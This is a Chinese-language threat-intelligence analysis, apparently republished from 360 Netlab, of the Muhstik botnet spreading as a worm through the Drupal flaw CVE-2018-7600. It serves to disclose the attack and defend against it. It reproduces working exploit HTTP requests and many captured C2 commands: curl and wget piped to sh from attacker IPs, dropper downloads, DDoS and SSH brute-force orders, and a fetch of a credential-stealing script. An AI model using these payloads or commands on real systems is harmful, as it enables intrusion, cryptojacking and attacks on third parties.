溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

僵尸網(wǎng)絡(luò)Muhstik怎么利用Drupal 漏洞 CVE-2018-7600 蠕蟲(chóng)式傳播

發(fā)布時(shí)間:2021-12-22 20:26:17 來(lái)源:億速云 閱讀:174 作者:柒染 欄目:網(wǎng)絡(luò)安全

今天就跟大家聊聊有關(guān)僵尸網(wǎng)絡(luò)Muhstik怎么利用Drupal 漏洞 CVE-2018-7600 蠕蟲(chóng)式傳播,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。

2018年3月28日,Drupal.org 公布了漏洞 CVE-2018-7600 的修復(fù)方案。Drapal 是一個(gè)開(kāi)源的內(nèi)容管理系統(tǒng),由PHP語(yǔ)言寫(xiě)成,有很多網(wǎng)站使用 Drupal 向外提供網(wǎng)頁(yè)服務(wù)。本次漏洞存在于 Drupal 的多個(gè)版本中,攻擊者可以利用該漏洞完全控制網(wǎng)站。從2018年4月13日開(kāi)始,360網(wǎng)絡(luò)安全研究院觀測(cè)到互聯(lián)網(wǎng)上有大量針對(duì)該漏洞的掃描。通過(guò)分析,我們認(rèn)為有至少3組惡意軟件在利用該漏洞傳播。其中一組惡意軟件有蠕蟲(chóng)傳播行為,感染量顯著比其他的惡意軟件更多。分析后,我們認(rèn)為這是一個(gè)長(zhǎng)期存在的僵尸網(wǎng)絡(luò)家族。我們將其命名為    muhstik,這主要是因?yàn)槠涠M(jìn)制文件名和通信協(xié)議中多處包含了這個(gè)字符串。我們認(rèn)為 muhstik 有以下特點(diǎn)值得社區(qū)關(guān)注:

  • 蠕蟲(chóng)式傳播

  • 長(zhǎng)期存在

  • 使用的漏洞利用數(shù)目眾多

  • 混合使用了多種牟利方式

攻擊載荷

按照時(shí)間順序,Muhstik使用了下面兩組攻擊載荷,這兩組載荷占據(jù)了全部看到的載荷的80%左右,是我們看到的攻擊的主要部分:

  • #1 活躍時(shí)間:2018-04-14 03:33:06~ 2018-04-17 15:40:58

  • #2 活躍時(shí)間:2018-04-16 19:38:39~至今

對(duì)應(yīng)的攻擊來(lái)源,其 IP 地址非常分散,而且基本都運(yùn)行著 Drupal 程序。攻擊來(lái)源自身是攻擊載荷的易感染目標(biāo),這是蠕蟲(chóng)式傳播的重要指標(biāo),引起了我們的警覺(jué)。兩組攻擊載荷的詳細(xì)信息如下:

POST  
/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Cache-Control: no-cache  
Connection: keep-alive  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
Host: {target}  
Content-Type: application/x-www-form-urlencoded  
Content-length: 2048  
form_id=user_register_form&_drupal_ajax=1&mail[#post_render[]=exec&mail[#type]=markup&mail[#markup]=echo "team6 representing 73de29021fd0d8d2cfd204d2d955a46d"|tee t6nv
POST  
/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Cache-Control: no-cache  
Connection: keep-alive  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
Host: {target}  
Content-Type: application/x-www-form-urlencoded  
Content-length: 170  
form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php

樣本 aiox86 導(dǎo)致了上述攻擊載荷 #2

有以下關(guān)鍵樣本

da17dc1438bb039968a5737c6fbc88cd aiox86

我們認(rèn)為上述樣本 aiox86 及其相關(guān)樣本產(chǎn)生了前述攻擊載荷:

  • #2 攻擊載荷,存在于該樣本中

  • #1 攻擊載荷與 #2 非常相似,我們認(rèn)為應(yīng)該是該樣本的相關(guān)樣本產(chǎn)生

僵尸網(wǎng)絡(luò)Muhstik怎么利用Drupal 漏洞 CVE-2018-7600 蠕蟲(chóng)式傳播

事實(shí)上,該樣本的掃描行為已經(jīng)比較復(fù)雜,遠(yuǎn)不止前述針對(duì) drupal 漏洞的掃描:

  • 掃描目標(biāo)IP地址:會(huì)從遠(yuǎn)端服務(wù)器 191.238.234.227 獲取目標(biāo)IP地址,這樣攻擊者可以對(duì)攻擊目標(biāo)有較為靈活的控制;

  • 投遞漏洞載荷:不僅限于 Drupal,還包括另外 6 種漏洞載荷;

  • 掃描目標(biāo)端口:不僅限于 TCP 80,還包括TCP端口 8080, 7001, 2004;每個(gè)端口上會(huì)嘗試若干不同載荷;

  • 掃描結(jié)果上報(bào):載荷植入成功后,會(huì)訪問(wèn)遠(yuǎn)端服務(wù)器 51.254.219.134 上報(bào),不同載荷訪問(wèn)不同的URL。通過(guò)這種方式,攻擊者可以很輕易的識(shí)別受害者的弱點(diǎn)。

獲取掃描目標(biāo)IP地址:

hxxp://191.238.234.227/amazon.php     #我們嘗試從這個(gè)URL上獲得了50個(gè)網(wǎng)段,均屬于Amazon所有  
hxxp://191.238.234.227/dedi.php       #我們嘗試從這個(gè)URL上獲得了50個(gè)網(wǎng)段,所屬公司較為分散

所投遞的漏洞載荷:

ClipBucket:rss.php  
DasanNetwork Solution:/cgi-bin/index.cgi  
Drupal:CVE-2018-7600  
WebDav  
Weblogic:CVE-2017-10271  
Webuzo:install.php  
Wordpress:install.php

掃描目標(biāo)端口與載荷的對(duì)應(yīng)關(guān)系:

80:Weblogic,Wordpress,Drupal,WebDav,ClipBucket  
2004:Webuzo  
7001:Weblogic  
8080:Wordpress,WebDav,DasanNetwork Solution

載荷上報(bào)信息接口:

hxxp://51.254.219.134/clipbucket.php    #ClipBucket  
hxxp://51.254.219.134/dasan.php    #DasanNetwork_Solution  
hxxp://51.254.219.134/dav.php    #Webdav  
hxxp://51.254.219.134/drupal.php    #Drupal  
hxxp://51.254.219.134/oracleaudit.php?port=    #Weblogic  
hxxp://51.254.219.134/tomato.php    #http401,用作探測(cè)中間狀態(tài)  
hxxp://51.254.219.134/webuzo.php    #Webuzo  
hxxp://51.254.219.134/wp.php    #Wordpress

樣本aiox86 是由 Muhstik 僵尸網(wǎng)絡(luò)分發(fā)的

在 360網(wǎng)絡(luò)安全研究院,我們持續(xù)的監(jiān)控諸多僵尸網(wǎng)絡(luò)的攻擊指令。本次我們發(fā)現(xiàn),139.99.101.96:9090 控制服務(wù)器,在2018-04-19 04:04附近,通過(guò)下述指令分發(fā)了樣本 aiox86: 

僵尸網(wǎng)絡(luò)Muhstik怎么利用Drupal 漏洞 CVE-2018-7600 蠕蟲(chóng)式傳播

上述C2,隸屬于 Muhstik 僵尸網(wǎng)絡(luò)家族。

Muhstik 僵尸網(wǎng)絡(luò)家族

Muhstik 是 Tsunami 僵尸網(wǎng)絡(luò)的一個(gè)變種,其特點(diǎn)包括:

  • 代表樣本: c37016e34304ff4a2a0db1894cdcdb92

  • C2服務(wù)器: 域名/IP地址共計(jì)11個(gè),見(jiàn)后,端口均為 9090。我們猜測(cè)這是為了負(fù)載均衡

  • 通信協(xié)議: 基于IRC服務(wù)協(xié)議,通過(guò)不同的Channel發(fā)送不同指令

  • IRC Channel:我們觀察到有多個(gè)IRC Channel,均以 muhstik 開(kāi)頭。目前我們并不完全確認(rèn)每個(gè)C2服務(wù)器上具體開(kāi)通了哪些Channle,這是由IRC協(xié)議本身的特性決定的,僅在我們接收到對(duì)應(yīng)Channel里的通信指令時(shí),才能確認(rèn)攻擊者在該服務(wù)器上開(kāi)通了該Channel

Muhstik 僵尸網(wǎng)絡(luò)的結(jié)構(gòu)已經(jīng)比較復(fù)雜了,如前所述,樣本中硬編碼了11個(gè)C2域名/IP。除此之外,其傳播和獲利方式也多種多樣。Muhstik 的傳播模塊:

  • aioscan掃描模塊:如前所述,該掃描模塊里包含了4個(gè)端口上6種掃描載荷

  • SSH掃描模塊:弱口令掃描

Muhstik 的獲利方式:

  • xmrig 挖礦:挖取XMR數(shù)字代幣,對(duì)應(yīng)的礦池地址是147.135.208.145:4871,自建礦池。

  • cgminer挖礦:挖取BTC數(shù)字代幣,使用了多個(gè)礦池,用戶名均為reb0rn.D3

  • DDoS 攻擊:我們?cè)?018-04-19 當(dāng)天 07:20~07:40期間,截獲多條針對(duì) 46.243.189.102 的攻擊指令。(在我們的DDoSMon.net沒(méi)有看到這次攻擊,但是看到了較早前針對(duì)該IP地址的多次攻擊)

Muhstik cgminer 錢(qián)包和礦池地址:

  {
    "url": "stratum+tcp://dash.viabtc.com:443",
    "user": "reb0rn.D3",
    "pass": "x"
  },
  {
    "url": "stratum+tcp://dash.viabtc.com:443",
    "user": "reb0rn.D3",
    "pass": "x"
  },
  {
    "url": "stratum+tcp://dash.viabtc.com:443",
    "user": "reb0rn.D3",
    "pass": "x"
  }

Muhstik C2 列表,按照其在樣本中硬編碼的順序:

139.99.101.96:9090    AS16276 OVH SAS  
144.217.84.99:9090    AS16276 OVH SAS  
145.239.84.0:9090    AS16276 OVH SAS  
147.135.210.184:9090    AS16276 OVH SAS  
142.44.163.168:9090    AS16276 OVH SAS  
192.99.71.250:9090    AS16276 OVH SAS  
142.44.240.14:9090    AS16276 OVH SAS  
121.128.171.44:9090    AS4766 Korea Telecom    #當(dāng)前未生效  
66.70.190.236:9090    AS16276 OVH SAS #當(dāng)前未生效  
145.239.93.125:9090    AS16276 OVH SAS  
irc.de-zahlung.eu:9090        #當(dāng)前未生效

IRC Channel,字母序:

#muhstik
#muhstik-i586
#muhstik-SSH
#muhstik-x86

我們監(jiān)聽(tīng)這些 IRC Channel時(shí)獲取到若干指令,部分指令如下,截圖依次見(jiàn)后:

#muhstik-x86  #植入xmrig64挖礦程序;
#muhstik-x86  #植入Muhstik.aioscan掃描模塊
#muhstik-x86  #探測(cè)bot是否有drupal存在
#muhstik      #植入Muhstik.aioscan掃描模塊
#muhstik      #發(fā)出DDoS攻擊指令;
#muhstik-SSH  #cgminer 挖礦程序的配置文件;
#muhstik-SSH  #執(zhí)行SSH掃描
#muhstik-SSH  #竊取本地保存的ssh憑證,進(jìn)一步橫向擴(kuò)展,投遞自身,實(shí)現(xiàn)蠕蟲(chóng)式傳播
#muhstik-i586 #植入 Muhstik.aioscan
#muhstik-i586 #植入xmrig32挖礦程序

#muhstik-x86 #植入xmrig64挖礦程序

:TIMERS!tcl@localhost PRIVMSG #muhstik-x86 :!* SH curl http://104.236.26.43/muhstik.sh | sh > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-x86 :!* SH wget -qO - http://104.236.26.43/muhstik.sh | sh > /dev/null 2>&1 &

#muhstik-x86 #植入Muhstik.aioscan掃描模塊

:TIMERS!tcl@localhost PRIVMSG #muhstik-x86 :!x* SH (wget -c http://191.238.234.227/x/aiox86 -O /tmp/aiox86 ; chmod +x /tmp/aiox86) > /dev/null 2>&1 :TIMERS!tcl@localhost PRIVMSG #muhstik-x86 :!x* SH /tmp/aiox86 amazon > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-x86 :!x* SH /tmp/aiox86 dedi > /dev/null 2>&1 &

#muhstik-x86 #探測(cè)bot是否有drupal存在

:m!m@null PRIVMSG #muhstik-x86 :!* SH (wc -l autoload.php && echo $(hostname -I | cut -d" " -f 1))
:m!m@null PRIVMSG #muhstik-x86 :!* SH (wc -l autoload.php && echo $(hostname -I | cut -d" " -f 1)) || echo "No drupal"
:m!m@null PRIVMSG #muhstik-x86 :!* SH (wc -l autoload.php | grep 17 && echo $(hostname -I | cut -d" " -f 1))
:m!m@null PRIVMSG #muhstik-x86 :(wc -l autoload.php && echo $(hostname -I | cut -d" " -f 1)) || echo "No drupal"

#muhstik #植入Muhstik.aioscan掃描模塊

:TIMERS!tcl@localhost PRIVMSG #muhstik :!A* SH /tmp/aioarm amazon > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!A* SH /tmp/aioarm dedi > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!A* SH (wget -c http://191.238.234.227/x/aioarm -O /tmp/aioarm ; chmod +x /tmp/aioarm) > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!Mps|* SH /tmp/aiomipsel amazon > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!Mps|* SH /tmp/aiomipsel dedi > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!Mps|* SH (wget -c http://191.238.234.227/x/aiomipsel -O /tmp/aiomipsel ; chmod +x /tmp/aiomipsel) > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!M|* SH /tmp/aiomips amazon > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!M|* SH /tmp/aiomips dedi > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!M|* SH (wget -c http://191.238.234.227/x/aiomips -O /tmp/aiomips ; chmod +x /tmp/aiomips) > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!PPC|* SH /tmp/aioppc amazon > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!PPC|* SH /tmp/aioppc dedi > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik :!PPC|* SH (wget -c http://191.238.234.227/x/aioppc -O /tmp/aioppc ; chmod +x /tmp/aioppc) > /dev/null 2>&1 &

#muhstik #發(fā)出DDoS攻擊指令;

:m!m@null PRIVMSG #muhstik :!* STD 46.243.189.102 127 60 XXXXXXXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*0|* STD 46.243.189.102 127 30 XXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*1|* STD 46.243.189.102 127 30 XXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*2|* STD 46.243.189.102 127 30 XXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*3|* STD 46.243.189.102 127 30 XXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*4|* STD 46.243.189.102 127 30 XXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*5|* STD 46.243.189.102 127 30 XXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*6|* STD 46.243.189.102 127 30 XXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*7|* STD 46.243.189.102 127 30 XXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*8|* STD 46.243.189.102 127 30 XXXX
:TIMERS!tcl@localhost PRIVMSG #muhstik :!*|*|*9|* STD 46.243.189.102 127 30 XXXX

#muhstik-SSH #cgminer 挖礦程序的配置文件

:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep D3 && ( wget -qO - http://51.254.221.129/cgminer.x11.conf > /config/cgminer.conf && /etc/init.d/cgminer.sh restart ) > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep L3 && ( wget -qO - http://51.254.221.129/cgminer.scrypt.conf > /config/cgminer.conf && /etc/init.d/cgminer.sh restart )> /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep S4 && (cgminer-api "addpool|stratum+tcp://bch.viabtc.com:443,reborn.api,x" && cgminer-api "switchpool|3" ) > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep S5 && (cgminer-api "addpool|stratum+tcp://bch.viabtc.com:443,reborn.api,x" && cgminer-api "switchpool|3" ) > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep S7 && ( wget -qO - http://51.254.221.129/cgminer.sha256.conf > /config/cgminer.conf && /etc/init.d/cgminer.sh restart) > /dev/null 2>&1 &

#muhstik-SSH #竊取本地保存的ssh憑證,進(jìn)一步橫向擴(kuò)展,投遞自身,實(shí)現(xiàn)蠕蟲(chóng)式傳播

:m!m@null PRIVMSG #muhstik-ssh :!* SH wget -qO - http://121.127.216.91/multiply/wp-content/plugins/all-in-one-wp-migration/t6ssh | sh > /dev/null 2>&1 &

#muhstik-SSH #執(zhí)行SSH掃描

:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 100 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 101 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 102 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 103 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 104 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 106 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 107 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 108 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 110 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 111 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 112 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 113 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 114 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 118 100 25 54.39.23.28 51.254.219.137
:TIMERS!tcl@localhost PRIVMSG #muhstik-ssh :!* SSH 119 100 25 54.39.23.28 51.254.219.137

#muhstik-i586 #植入 Muhstik.aioscan

:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!i* SH (wget -c http://191.238.234.227/x/aioi586 -O /tmp/aioi586 ; chmod +x /tmp/aioi586) > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!i* SH /tmp/aioi586 amazon > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!i* SH /tmp/aioi586 dedi > /dev/null 2>&1 &

#muhstik-i586 #植入xmrig32挖礦程序

:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!* SH wget -qO - http://104.236.26.43/xmrt32.sh | sh > /dev/null 2>&1 &
:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!* SH curl http://104.236.26.43/xmrt32.sh | sh > /dev/null 2>&1 &

Muhstik 可能來(lái)源已久

通過(guò)對(duì) Muhstik 相關(guān)域名的歷史溯源,我們發(fā)現(xiàn) Muhstik 由來(lái)已久,跟以下域名有較為強(qiáng)烈的關(guān)聯(lián)關(guān)系。

dasan.deutschland-zahlung.eu  
134.ip-51-254-219.eu  
uranus.kei.su  
wireless.kei.su  
www.kei.su  
y.fd6fq54s6df541q23sdxfg.eu

IoC

Muhstik C2 List

139.99.101.96:9090    AS16276 OVH SAS  
144.217.84.99:9090    AS16276 OVH SAS  
145.239.84.0:9090    AS16276 OVH SAS  
147.135.210.184:9090    AS16276 OVH SAS  
142.44.163.168:9090    AS16276 OVH SAS  
192.99.71.250:9090    AS16276 OVH SAS  
142.44.240.14:9090    AS16276 OVH SAS  
121.128.171.44:9090    AS4766 Korea Telecom    #當(dāng)前未生效  
66.70.190.236:9090    AS16276 OVH SAS #當(dāng)前未生效  
145.239.93.125:9090    AS16276 OVH SAS  
irc.de-zahlung.eu:9090        #當(dāng)前未生效

Muhstik Malware URL

hxxp://51.254.221.129/c/cron  
hxxp://51.254.221.129/c/tfti  
hxxp://51.254.221.129/c/pftp  
hxxp://51.254.221.129/c/ntpd  
hxxp://51.254.221.129/c/sshd  
hxxp://51.254.221.129/c/bash  
hxxp://51.254.221.129/c/pty  
hxxp://51.254.221.129/c/shy  
hxxp://51.254.221.129/c/nsshtfti  
hxxp://51.254.221.129/c/nsshcron  
hxxp://51.254.221.129/c/nsshpftp  
hxxp://51.254.221.129/c/fbsd  
hxxp://191.238.234.227/x/aiox86

Muhstik Malware MD5

c37016e34304ff4a2a0db1894cdcdb92     #Muhstik樣本模塊  
da17dc1438bb039968a5737c6fbc88cd     #Muhstik掃描模塊

看完上述內(nèi)容,你們對(duì)僵尸網(wǎng)絡(luò)Muhstik怎么利用Drupal 漏洞 CVE-2018-7600 蠕蟲(chóng)式傳播有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝大家的支持。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI